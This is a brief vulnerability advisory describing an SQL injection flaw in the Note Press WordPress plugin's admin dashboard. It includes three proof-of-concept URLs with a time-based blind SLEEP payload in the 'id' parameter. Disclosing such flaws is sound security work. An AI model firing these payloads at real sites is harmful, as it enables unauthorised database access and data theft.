The plugin does not sanitise and escape the id parameter before using it in various SQL statement via the admin dashboard, leading to SQL Injections
https://example.com/wp-admin/admin.php?page=Note_Press-Main-Menu&action=view&id=17+AND+(SELECT+3630+FROM+(SELECT(SLEEP(5)))KdTt)
https://example.com/wp-admin/admin.php?page=Note_Press-Main-Menu&action=edit&id=17+AND+(SELECT+3630+FROM+(SELECT(SLEEP(5)))KdTt)
https://example.com/wp-admin/admin.php?page=Note_Press-Main-Menu&action=delete&id=17+AND+(SELECT+3630+FROM+(SELECT(SLEEP(5)))KdTt)